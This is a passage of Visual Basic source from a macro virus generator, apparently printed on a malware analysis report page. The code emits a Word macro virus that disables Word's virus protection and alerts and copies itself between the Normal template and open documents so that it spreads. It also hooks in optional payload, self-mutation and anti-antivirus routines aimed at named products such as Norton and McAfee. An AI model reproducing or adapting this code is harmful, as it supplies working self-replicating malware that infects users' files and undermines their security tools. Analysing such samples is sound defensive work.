Print #1, " Dialogs(wdDialogToolsWordCount).Show"
Print #1,
Print #1, " On Error GoTo " & VirusName
Print #1,
If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then
Print #1, " Payload"
Print #1,
End If
If frmPolymorphic.optAPMRS = True Then
Print #1, " Mutate"
Print #1,
End If
Print #1, " Application.ScreenUpdating = False"
Print #1, " Application.DisplayAlerts = wdAlertsNone"
Print #1,
Print #1, " WordBasic.DisableAutoMacros 0"
Print #1, " Options.VirusProtection = False"
Print #1,
Print #1, " Set GlobalDoc = NormalTemplate"
Print #1, " Set ActiveDoc = ActiveDocument"
Print #1,
Print #1, " GlobalInstalled = No"
Print #1, " DocumentInstalled = No"
Print #1,
Print #1, " For j = 1 To NormalTemplate.VBProject.VBComponents.Count"
Print #1, " If NormalTemplate.VBProject.VBComponents(j).Name = """ & VirusName & """ Then"
Print #1, " GlobalInstalled = Yes"
Print #1, " End If"
Print #1, " Next"
Print #1,
Print #1, " For i = 1 To ActiveDocument.VBProject.VBComponents.Count"
Print #1, " If ActiveDocument.VBProject.VBComponents(i).Name = """ & VirusName & """ Then"
Print #1, " DocumentInstalled = Yes"
Print #1, " End If"
Print #1, " Next"
Print #1,
Print #1, " If GlobalInstalled = No Then"
Print #1, " Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " Options.SaveNormalPrompt = False"
Print #1, " End If"
Print #1,
Print #1, " If DocumentInstalled = No Then"
Print #1, " Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " End If"
Print #1,
Print #1, " Application.DisplayAlerts = wdAlertsAll"
Print #1,
If frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then
Print #1, " Retro"
Print #1,
End If
Print #1, VirusName & ":"
Print #1, "End Sub"
Print #1,
End If
If frmStealth.chkbToolsMacro = True Then
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.